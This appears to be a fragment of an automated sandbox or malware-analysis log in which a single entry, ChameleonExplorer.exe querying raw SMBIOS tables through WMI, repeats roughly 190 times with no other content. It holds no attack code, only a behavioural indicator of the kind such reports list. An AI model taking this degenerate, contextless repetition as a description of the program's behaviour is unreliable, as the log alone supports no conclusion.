                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
